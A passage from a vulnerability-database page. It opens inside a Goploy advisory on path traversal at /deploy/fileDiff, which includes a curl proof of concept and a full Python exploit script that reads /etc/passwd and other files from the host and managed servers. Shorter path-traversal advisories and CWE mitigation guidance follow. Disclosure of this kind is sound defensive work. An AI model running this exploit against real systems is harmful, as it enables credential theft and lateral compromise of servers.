(FileCompare)\u201d\u6743\u9650**\u3002\u8fd9\u610f\u5473\u7740\u7cfb\u7edf\u53ea\u8981\u6dfb\u52a0\u4e86\u4e00\u4e2a\u666e\u901a\u7684\u4f4e\u6743\u9650\u4f7f\u7528\u8005\uff0c\u5176\u5929\u7136\u5c31\u5177\u5907\u8c03\u7528\u76ee\u6807\u6f0f\u6d1e\u7aef\u70b9\u7684\u57fa\u7840\u6743\u9650\u3002\u653b\u51fb\u524d\u63d0\u4ec5\u4ec5\u662f\u7cfb\u7edf\u4e2d\u914d\u7f6e\u4e86\u81f3\u5c11\u4e00\u4e2a\u9879\u76ee\u548c\u4e00\u4e2a\u670d\u52a1\u5668\u3002\n\n\u653b\u51fb\u8005\u4ec5\u9700\u901a\u8fc7\u6293\u5305\u6307\u5b9a\u6b63\u786e\u7684\u547d\u540d\u7a7a\u95f4 Header\uff08\u4f8b\u5982 `G-N-ID: 1`\uff09\u7ed5\u8fc7\u5176\u7b80\u5355\u7684\u9650\u5236\u62e6\u622a\uff0c\u4e14\u904d\u5386\u53ef\u7528\u7684 `serverId` \u53c2\u6570\uff0c\u5373\u53ef\u76f4\u63a5\u5229\u7528\u8be5\u7aef\u70b9\u6210\u529f\u6267\u884c\u8def\u5f84\u904d\u5386\uff0c\u8bfb\u53d6 Goploy \u672c\u5730\u5bbf\u4e3b\u673a\u4ee5\u53ca**\u5404\u4e2a\u8fdc\u7aef\u88ab Goploy \u7ba1\u7406\u7684\u76ee\u6807\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u6587\u4ef6**\u3002\n\n## \u6f0f\u6d1e\u590d\u73b0\u6b65\u9aa4 (Proof of Concept)\n\n### \u7406\u8bba\u6b65\u9aa4\uff08\u5177\u4f53\u6b65\u9aa4\u89c1\u4e0b\uff09\n1. **\u83b7\u53d6\u666e\u901a\u7528\u6237\u6743\u9650**\n   \u4f7f\u7528\u4efb\u610f\u5df2\u6ce8\u518c\u7684\u4f4e\u6743\u9650\u8d26\u6237\u767b\u5f55\u7cfb\u7edf\uff0c\u83b7\u53d6\u6709\u6548\u7684\u8eab\u4efd\u8ba4\u8bc1\u51ed\u8bc1\uff08Cookie/Token\uff09\u3002\u83b7\u53d6\u5176\u5bf9\u5e94\u6709\u6743\u9650\u7684 Namespace ID\u3002\n\n2. **\u6784\u9020\u6076\u610f\u8bf7\u6c42**\n   \u5411\u76ee\u6807\u63a5\u53e3 `/deploy/fileDiff` \u53d1\u9001\u5305\u542b\u76ee\u5f55\u7a7f\u8d8a\u5b57\u7b26 `../` \u7684 POST \u8bf7\u6c42\uff0c\u5e76\u643a\u5e26 `G-N-ID`\u3002\n\n   **PoC \u793a\u4f8b\uff08\u8bfb\u53d6 `/etc/passwd`,\u53ef\u4ee5\u904d\u5386`serverId`\uff09\uff1a**\n   ```bash\n   curl -s -X POST -b \"goploy_token=\u003c\u7528\u6237\u7684\u6709\u6548cookie\u003e\" \\\n        -H \"Content-Type: application/json\" \\\n        -H \"G-N-ID: 1\" \\\n        -d \u0027{\"projectId\":1,\"serverId\":1,\"filePath\":\"../../../../../../../../../../etc/passwd\"}\u0027 \\\n        \"http://\u003ctarget-host\u003e/deploy/fileDiff\"\n   ```\n2. **\u590d\u73b0\u7ed3\u679c**\n   \u670d\u52a1\u5668\u5c06\u8fd4\u56de\u5bbf\u4e3b\u673a\u548c\u8fdc\u7aef\u670d\u52a1\u5668 `/etc/passwd` \u6587\u4ef6\u7684\u5b8c\u6574\u5185\u5bb9\u3002\n### \u5177\u4f53\u6b65\u9aa4\n1. **\u73af\u5883**\n    \u4f7f\u7528\u8d85\u7ba1\u8d26\u53f7\u4efb\u610f\u53d1\u5e03\u4e86\u4e00\u4e2a\u9879\u76ee\uff1a\n    \u003cimg width=\"1919\" height=\"428\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8618a038-9088-45b4-804a-5541e243c6a8\" /\u003e\n\n    \u8bbe\u7f6e\u4e86\u4e24\u4e2a\u7eb3\u7ba1\u670d\u52a1\u5668\uff1a\n    \u003cimg width=\"1896\" height=\"399\" alt=\"image-1(1)\" src=\"https://github.com/user-attachments/assets/89cfa086-d20b-448e-9cf7-1af5798e3cfe\" /\u003e\n\n    \u521b\u5efa\u4e86\u4e00\u4e2a\u666e\u901a\u7528\u6237\uff0c\u5e76\u8d4b\u4e88menmber\u89d2\u8272\uff08\u6587\u4ef6\u5bf9\u6bd4\u6743\u9650\uff09\uff1a\n    \u003cimg width=\"1910\" height=\"343\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/b8dda364-c23d-4496-a555-ff477c511d31\" /\u003e\n\n    \u003cimg width=\"951\" height=\"364\" alt=\"image-3\" src=\"https://github.com/user-attachments/assets/0e20cbed-7341-484c-b0a7-0fcd6ca2fea6\" /\u003e\n\n2. **\u83b7\u53d6\u666e\u901a\u7528\u6237\u6743\u9650**\n    \u4f7f\u7528\u5df2\u6ce8\u518c\u7684`test`\u8d26\u6237\u767b\u5f55\u7cfb\u7edf\uff0c\u83b7\u53d6\u6709\u6548\u7684\u8eab\u4efd\u8ba4\u8bc1\u51ed\u8bc1\uff08Cookie/Token\uff09\u3002\n    \u003cimg width=\"1916\" height=\"712\" alt=\"image-4(1)\" src=\"https://github.com/user-attachments/assets/a269b79f-a666-4f3a-95c4-40621e1fbbc2\" /\u003e\n\n3. **\u8fd0\u884cpoc.py\uff08\u89c1\u6587\u672b\uff09**\n    * \u53c2\u6570\u89e3\u91ca\uff1a\n    -u : \u76ee\u6807URL\n    -t : \u6b32\u4f7f\u7528\u7684Cookie/Token\n    -f : \u6b32\u8bfb\u53d6\u7684\u6587\u4ef6\n    -s : \u6b32\u8bfb\u53d6\u7684\u7eb3\u7ba1\u670d\u52a1\u5668\u7684ID\n    * \u8bfb\u53d6\u7b2c\u4e00\u4e2a\u7eb3\u7ba1\u670d\u52a1\u5668\uff1a\n    ```bash\n    python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 1\n    ```\n    \u003cimg width=\"1173\" height=\"608\" alt=\"image-6(1)\" src=\"https://github.com/user-attachments/assets/e442c247-3ebf-449f-94df-2b2b533b9449\" /\u003e\n    \n    \u003cimg width=\"870\" height=\"190\" alt=\"image-5\" src=\"https://github.com/user-attachments/assets/9e53b13a-915c-4f5e-b1bc-f0b3c0b64656\" /\u003e\n\n    * \u8bfb\u53d6\u7b2c\u4e8c\u4e2a\u7eb3\u7ba1\u670d\u52a1\u5668\uff1a\n    ```bash\n    python poc.py -u http://192.168.x.x:8080 -t eyJhbGxxxxxxxxxx... -f /etc/passwd -s 2\n    ```\n    \u003cimg width=\"1173\" height=\"231\" alt=\"image-8(1)\" src=\"https://github.com/user-attachments/assets/54e77e8a-259d-4f74-bf31-1a9625bcbe52\" /\u003e\n\n4. **\u590d\u73b0\u7ed3\u679c**\n   \u670d\u52a1\u5668\u8fd4\u56de\u5bbf\u4e3b\u673a\u548c\u4efb\u610f\u8fdc\u7aef\u670d\u52a1\u5668 `/etc/passwd` \u6587\u4ef6\u7684\u5b8c\u6574\u5185\u5bb9\u3002\n\n## \u6f0f\u6d1e\u5371\u5bb3\n\u901a\u8fc7\u8be5\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u8d8a\u6743\u8bfb\u53d6\u5bbf\u4e3b\u673a\u4ee5\u53ca\u6240\u6709\u7eb3\u7ba1\u670d\u52a1\u5668\u76ee\u6807\u4e2d\u7684\u4efb\u4f55\u654f\u611f\u6587\u4ef6\u3002\u4f8b\u5982\uff1a\n- \u8bfb\u53d6\u672c\u5730\u6216\u76ee\u6807\u8fdc\u7aef\u670d\u52a1\u5668\u7684 `/etc/passwd` \u6216 `/etc/shadow` \u83b7\u53d6\u4e3b\u673a\u7cfb\u7edf\u7528\u6237\u4fe1\u606f\u3002\n- \u8bfb\u53d6\u5404\u4e2a\u7cfb\u7edf\u4e2d\u7528\u6237\u7684 SSH \u79c1\u94a5\uff08\u5982 `~/.ssh/id_rsa`\uff09\uff0c\u4ece\u800c\u5229\u7528\u79c1\u94a5\u65e0\u9700\u5bc6\u7801\u76f4\u63a5\u901a\u8fc7 SSH \u8fdc\u7a0b\u8fde\u63a5\u5bbf\u4e3b\u673a\u6216\u8de8\u7f51\u6bb5\u8fde\u63a5\u5176\u4ed6\u670d\u52a1\u5668\uff0c\u7a83\u53d6\u670d\u52a1\u5668\u63a7\u5236\u6743\uff0c\u8fbe\u5230\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\uff08RCE\uff09\u7684\u540c\u7b49\u5371\u5bb3\u3002\n- \u7ed3\u5408\u5bf9 `serverID` \u7684\u679a\u4e3e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5c06 Goploy \u4f5c\u4e3a\u8df3\u677f\u673a\uff0c\u9488\u5bf9\u6240\u6709\u7ed1\u5b9a\u7684\u4e0b\u53d1\u76ee\u6807\u7cfb\u7edf\u8fdb\u884c\u5927\u8303\u56f4\u7684\u4fe1\u606f\u7a83\u53d6\u3002\n- \u83b7\u53d6\u7cfb\u7edf\u7684\u5404\u7c7b\u5173\u952e\u914d\u7f6e\u6587\u4ef6\u3001\u6570\u636e\u5e93\u51ed\u8bc1\u7b49\u3002\n\n## \u4fee\u590d\u5efa\u8bae\n1. **\u8f93\u5165\u53c2\u6570\u8fc7\u6ee4**\uff1a\u5728\u63a5\u6536\u5e76\u5904\u7406\u5ba2\u6237\u7aef\u4f20\u9012\u7684\u6587\u4ef6\u8def\u5f84\u65f6\uff0c\u4e25\u683c\u8fc7\u6ee4 `../` \u3001`..\\\\` \u4ee5\u53ca `%00` \u7b49\u53ef\u80fd\u5f15\u8d77\u76ee\u5f55\u8de8\u8d8a\u4e0e\u622a\u65ad\u7684\u7279\u6b8a\u5b57\u7b26\u3002\n2. **\u8def\u5f84\u767d\u540d\u5355\u7ea6\u675f**\uff1a\u5229\u7528 `filepath.Clean` \u7b49\u5185\u7f6e\u51fd\u6570\u683c\u5f0f\u5316\u8def\u5f84\uff0c\u5e76\u4e14\u5728\u6267\u884c\u7cfb\u7edf\u6587\u4ef6\u8bfb\u5199\u64cd\u4f5c\u524d\uff0c\u5f3a\u5236\u6821\u9a8c\u89e3\u6790\u540e\u7684\u7edd\u5bf9\u8def\u5f84\u524d\u7f00\u662f\u5426\u5904\u4e8e\u5e94\u7528\u6240\u5141\u8bb8\u7684\u5408\u6cd5\u53d7\u9650\u76ee\u5f55\u8303\u56f4\uff08\u5982\u9884\u8bbe\u7684\u6c99\u76d2\u76ee\u5f55\u6216\u9879\u76ee\u5de5\u4f5c\u533a\u5185\uff09\u5185\u3002\n3. **\u6743\u9650\u6700\u5c0f\u5316**\uff1a\u8fd0\u884c Goploy \u670d\u52a1\u7684\u73af\u5883\u6216\u955c\u50cf\u5e94\u5c3d\u53ef\u80fd\u4ee5\u4f4e\u6743\u9650\u7528\u6237\u8eab\u4efd\u8fd0\u884c\uff0c\u4ee5\u6b64\u51cf\u5f31\u88ab\u8bfb\u53d6\u654f\u611f\u6587\u4ef6\u7684\u98ce\u9669\u3002\n4. **\u68c0\u67e5\u5176\u4ed6API**\uff1a\u9664\u4ee5\u4e0aAPI\uff0c\u8fd8\u6709\u591a\u5904API\u5b58\u5728\u8def\u5f84\u904d\u5386\u6f0f\u6d1e\uff0c\u5982\u679c\u7528\u6237\u83b7\u5f97\u76f8\u5e94\u7684\u6743\u9650\uff0c\u540c\u6837\u4f1a\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u8bfb**\u751a\u81f3\u5199**\u3002\n\n## poc.py\n```python\n#!/usr/bin/env python3\nimport requests\nimport argparse\nimport sys\nimport urllib3\nimport json\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef banner():\n    print(r\"\"\"\n  ____             _               ____       ____ \n / ___| ___  _ __ | | ___  _   _  |  _ \\ ___ / ___|\n| |  _ / _ \\| \u0027_ \\| |/ _ \\| | | | | |_) / _ \\ |    \n| |_| | (_) | |_) | | (_) | |_| | |  __/ (_) | |___ \n \\____|\\___/| .__/|_|\\___/ \\__, | |_|   \\___/ \\____|\n            |_|            |___/                    \n\n    Goploy Authenticated Arbitrary File Read PoC\n    \"\"\")\n\ndef exploit(target_url, token, file_read, args):\n    if not target_url.startswith(\"http\"):\n        target_url = \"http://\" + target_url\n    \n    target_url = target_url.rstrip(\u0027/\u0027)\n    \n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\"\n    }\n    \n    cookies = {\n        \"goploy_token\": token\n    }\n    \n    print(\"[*] \u6b63\u5728\u5c1d\u8bd5\u81ea\u52a8\u4ece\u670d\u52a1\u5668\u54cd\u5e94\u4e2d\u63d0\u53d6\u5229\u7528\u6240\u9700\u7684\u6240\u6709\u53c2\u6570ID...\")\n    \n    # 1. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Namespace ID\n    namespace_id = 1\n    print(f\"[*] 1. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Namespace ID (/namespace/getOption)\")\n    try:\n        r_ns = requests.get(f\"{target_url}/namespace/getOption\", headers=headers, cookies=cookies, verify=False, timeout=10)\n        ns_data = r_ns.json()\n        if ns_data.get(\"code\") == 0 and len(ns_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n            namespace_id = ns_data[\"data\"][\"list\"][0][\"namespaceId\"]\n            print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230 Namespace ID: {namespace_id}\")\n        else:\n            print(f\"[-] \u63d0\u53d6 Namespace ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u4f7f\u7528\u9ed8\u8ba4\u503c 1\")\n    except Exception as e:\n        print(f\"[-] \u63d0\u53d6 Namespace ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # \u5c06\u83b7\u53d6\u5230\u7684 Namespace ID \u653e\u5165\u540e\u7eed\u8bf7\u6c42\u7684 Header \u4e2d\n    headers[\"G-N-ID\"] = str(namespace_id)\n\n    # 2. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Server ID\n    server_id = 1\n    if args.server_id is not None:\n        server_id = int(args.server_id)\n        print(f\"[*] 2. \u7528\u6237\u6307\u5b9a\u4e86 Server ID: {server_id} ,\u8df3\u8fc7\u81ea\u52a8\u63a2\u6d4b\u3002\u53ef\u7528\u4e8e\u6c34\u5e73\u63d0\u6743\u76ee\u6807\u7f51\u7edc\uff01\")\n    else:\n        print(f\"[*] 2. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Server ID (/server/getOption)\")\n        try:\n            r_srv = requests.get(f\"{target_url}/server/getOption\", headers=headers, cookies=cookies, verify=False, timeout=10)\n            srv_data = r_srv.json()\n            if srv_data.get(\"code\") == 0 and len(srv_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n                server_id = srv_data[\"data\"][\"list\"][0][\"id\"]\n                print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230\u53ef\u7528 Server ID: {server_id}\")\n            else:\n                print(f\"[-] \u63d0\u53d6 Server ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u5c1d\u8bd5\u731c\u6d4b\u503c 1\")\n        except Exception as e:\n            print(f\"[-] \u63d0\u53d6 Server ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # 3. \u52a8\u6001\u83b7\u53d6\u53ef\u7528\u7684 Project ID\n    project_id = 1\n    print(f\"[*] 3. \u5c1d\u8bd5\u83b7\u53d6\u53ef\u7528\u7684 Project ID (/deploy/getList)\")\n    try:\n        r_proj = requests.get(f\"{target_url}/deploy/getList\", headers=headers, cookies=cookies, verify=False, timeout=10)\n        proj_data = r_proj.json()\n        if proj_data.get(\"code\") == 0 and len(proj_data.get(\"data\", {}).get(\"list\", [])) \u003e 0:\n            project_id = proj_data[\"data\"][\"list\"][0][\"id\"]\n            print(f\"[+] \u6210\u529f\u63d0\u53d6\u5230 Project ID: {project_id}\")\n        else:\n            print(f\"[-] \u63d0\u53d6 Project ID \u5931\u8d25\u6216\u5217\u8868\u4e3a\u7a7a\uff0c\u5c06\u964d\u7ea7\u5c1d\u8bd5\u731c\u6d4b\u503c 1\")\n    except Exception as e:\n        print(f\"[-] \u63d0\u53d6 Project ID \u53d1\u751f\u5f02\u5e38: {e}\")\n\n    # ==========================\n    # 4. \u6267\u884c\u6f0f\u6d1e\u5229\u7528\n    # ==========================\n    headers[\"Content-Type\"] = \"application/json\"\n    \n    # \u6784\u9020\u76ee\u5f55\u7a7f\u8d8a payload\n    traversal_payload = \"../\" * 15 + file_read.lstrip(\u0027/\u0027)\n    \n    data = {\n        \"projectId\": project_id,\n        \"serverId\": server_id,\n        \"filePath\": traversal_payload\n    }\n\n    url_exploit = f\"{target_url}/deploy/fileDiff\"\n    print(f\"\\n[*] \u76ee\u6807\u5730\u5740: {url_exploit}\")\n    print(f\"[*] Payload\u4e2d\u5305\u542b\u7684\u7cfb\u7edf\u53c2\u6570: NamespaceID={namespace_id}, ProjectID={project_id}, ServerID={server_id}\")\n    print(f\"[*] \u5c1d\u8bd5\u8bfb\u53d6\u6587\u4ef6: {file_read}\")\n    print(f\"[*] \u53d1\u9001\u6700\u7ec8\u5229\u7528\u8bf7\u6c42\u4e2d...\\n\")\n\n    try:\n        response = requests.post(url_exploit, headers=headers, cookies=cookies, json=data, verify=False, timeout=10)\n        \n        if response.status_code == 200:\n            try:\n                # \u5c1d\u8bd5\u89e3\u6790 Goploy \u7684 JSON \u56de\u663e\u683c\u5f0f\n                json_data = response.json()\n                if json_data.get(\u0027code\u0027) in [0, 1, 2]: # \u6709\u65f6\u5019\u8bfb\u53d6\u56de\u663e\u4e3a\u5b8c\u6574\u7684 json \n                    data_obj = json_data.get(\u0027data\u0027) if isinstance(json_data.get(\u0027data\u0027), dict) else {}\n                    \n                    src_text = data_obj.get(\u0027srcText\u0027, \u0027\u0027)\n                    dist_text = data_obj.get(\u0027distText\u0027, \u0027\u0027)\n                    \n                    if src_text or dist_text:\n                        print(\"[+] \u6f0f\u6d1e\u5229\u7528\u6210\u529f\uff01\u4ea7\u751f\u53cc\u91cd\u6587\u4ef6\u8bfb\u53d6\u54cd\u5e94\uff1a\\n\")\n                        print(\"=\" * 50)\n                        print(f\"\u3010Goploy\u5bbf\u4e3b\u673a ({url_exploit} \u672c\u5730) \u7684\u6587\u4ef6\u5185\u5bb9\u8bb0\u5f55\u5728 srcText\u3011:\")\n                        print(\"-\" * 50)\n                        print(src_text if src_text else \"(\u7a7a)\")\n                        print(\"=\" * 50)\n                        print(f\"\u3010\u88ab\u63a7\u76ee\u6807\u7aef\u670d\u52a1\u5668 (ServerID: {server_id}) \u7684\u6587\u4ef6\u5185\u5bb9\u8bb0\u5f55\u5728 distText\u3011:\")\n                        print(\"-\" * 50)\n                        print(dist_text if dist_text else \"(\u7a7a)\")\n                        print(\"=\" * 50)\n                    else:\n                        print(\"[-] \u8bfb\u53d6\u64cd\u4f5c\u6267\u884c\u4f46\u672a\u8fd4\u56de\u5177\u4f53\u7684 srcText \u6216 distText \u6570\u636e\u3002\u6b63\u5728\u663e\u793a\u539f\u59cb API \u8fd4\u56de\uff1a\")\n                        print(json.dumps(json_data, indent=2))\n                else:\n                    print(f\"[-] \u670d\u52a1\u5668\u8fd4\u56de\u4e1a\u52a1\u9519\u8bef (Code={json_data.get(\u0027code\u0027)}): {json_data.get(\u0027message\u0027)}\")\n            except ValueError:\n                # \u5982\u679c\u4e0d\u662f JSON \u683c\u5f0f\uff0c\u76f4\u63a5\u8f93\u51fa\u54cd\u5e94\u6e90\u7801\n                print(\"[+] \u6536\u5230\u672a\u77e5\u683c\u5f0f\u54cd\u5e94\uff0c\u4ee5\u4e0b\u4e3a\u539f\u59cb\u6b63\u6587\u5185\u5bb9\uff1a\")\n                print(response.text)\n        else:\n            print(f\"[-] HTTP \u8bf7\u6c42\u5931\u8d25\uff0cHTTP \u72b6\u6001\u7801: {response.status_code}\")\n            print(response.text)\n            \n    except requests.exceptions.RequestException as e:\n        print(f\"[-] \u8fde\u63a5\u51fa\u9519: {e}\")\n\nif __name__ == \"__main__\":\n    banner()\n    parser = argparse.ArgumentParser(description=\"Goploy \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6982\u5ff5\u9a8c\u8bc1\u811a\u672c (PoC)\")\n    parser.add_argument(\"-u\", \"--url\", required=True, help=\"\u76ee\u6807\u7cfb\u7edf\u57fa\u7840 URL\uff0c\u4f8b\u5982\uff1ahttp://192.168.240.130\")\n    parser.add_argument(\"-t\", \"--token\", required=True, help=\"\u5177\u6709\u4f4e\u6743\u9650\u6210\u5458\u8d26\u6237\u7684 goploy_token (Cookie)\")\n    parser.add_argument(\"-f\", \"--file\", default=\"/etc/passwd\", help=\"\u60f3\u8981\u8bfb\u53d6\u7684\u76ee\u6807\u7edd\u5bf9\u8def\u5f84\u6587\u4ef6 (\u9ed8\u8ba4: /etc/passwd)\")\n    parser.add_argument(\"-s\", \"--server_id\", default=None, help=\"\u5f3a\u5236\u6307\u5b9a\u60f3\u8981\u8bfb\u53d6\u7684\u8fdc\u7a0b\u7ed1\u5b9a\u670d\u52a1\u5668ServerID(\u5982\u5ffd\u7565\u5219\u5c1d\u8bd5\u81ea\u52a8\u83b7\u53d6\u9996\u4e2a)\")\n    \n    args = parser.parse_args()\n    \n    exploit(args.url, args.token, args.file, args)\n\n```",
  "id": "GHSA-4g5x-hcwm-82jw",
  "modified": "2026-07-07T23:42:24Z",
  "published": "2026-07-07T23:42:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zhenorzz/goploy/security/advisories/GHSA-4g5x-hcwm-82jw"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zhenorzz/goploy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Goploy: Arbitrary File Read via Path Traversal in /deploy/fileDiff allows Remote Server Compromise"
}

GHSA-4G8V-54V8-JG88

Vulnerability from github – Published: 2024-06-04 15:30 – Updated: 2024-06-04 15:30
VLAI
Details

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in BetterAddons Better Elementor Addons allows PHP Local File Inclusion.This issue affects Better Elementor Addons: from n/a through 1.4.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-33541"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-04T13:15:51Z",
    "severity": "MODERATE"
  },
  "details": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in BetterAddons Better Elementor Addons allows PHP Local File Inclusion.This issue affects Better Elementor Addons: from n/a through 1.4.1.",
  "id": "GHSA-4g8v-54v8-jg88",
  "modified": "2024-06-04T15:30:58Z",
  "published": "2024-06-04T15:30:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33541"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/better-elementor-addons/wordpress-better-elementor-addons-plugin-1-4-1-local-file-inclusion-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4G9R-J6C2-XFF9

Vulnerability from github – Published: 2022-05-17 00:45 – Updated: 2022-05-17 00:45
VLAI
Details

Multiple directory traversal vulnerabilities in PowerAward 1.1.0 RC1, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the lang parameter to (1) agb.php, (2) angemeldet.php, (3) anmelden.php, (4) charts.php, (5) external_vote.php, (6) guestbook.php, (7) impressum.php, (8) index.php, (9) rss-reader.php, (10) statistic.php, (11) teilnehmer.php, (12) topsites.php, (13) votecode.php, (14) voting.php, and (15) winner.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-5204"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-11-21T17:30:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple directory traversal vulnerabilities in PowerAward 1.1.0 RC1, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the lang parameter to (1) agb.php, (2) angemeldet.php, (3) anmelden.php, (4) charts.php, (5) external_vote.php, (6) guestbook.php, (7) impressum.php, (8) index.php, (9) rss-reader.php, (10) statistic.php, (11) teilnehmer.php, (12) topsites.php, (13) votecode.php, (14) voting.php, and (15) winner.php.",
  "id": "GHSA-4g9r-j6c2-xff9",
  "modified": "2022-05-17T00:45:03Z",
  "published": "2022-05-17T00:45:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5204"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43463"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/5962"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/29993"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-4GG4-26Q8-WV28

Vulnerability from github – Published: 2026-02-13 18:31 – Updated: 2026-02-13 21:31
VLAI
Details

A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-13T18:16:18Z",
    "severity": "CRITICAL"
  },
  "details": "A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.",
  "id": "GHSA-4gg4-26q8-wv28",
  "modified": "2026-02-13T21:31:36Z",
  "published": "2026-02-13T18:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/i7MEDIA/mojoportal/security"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kid-tnt/Mojo-check/blob/main/Zipslip%20in%20MojoPortal%20version%202.9.0.1.md"
    },
    {
      "type": "WEB",
      "url": "https://www.mojoportal.com/mojoportal-2-9-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-20.1
Implementation

Strategy: Input Validation

  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
  • Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
  • realpath() in C
  • getCanonicalPath() in Java
  • GetFullPath() in ASP.NET
  • realpath() or abs_path() in Perl
  • realpath() in PHP
Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

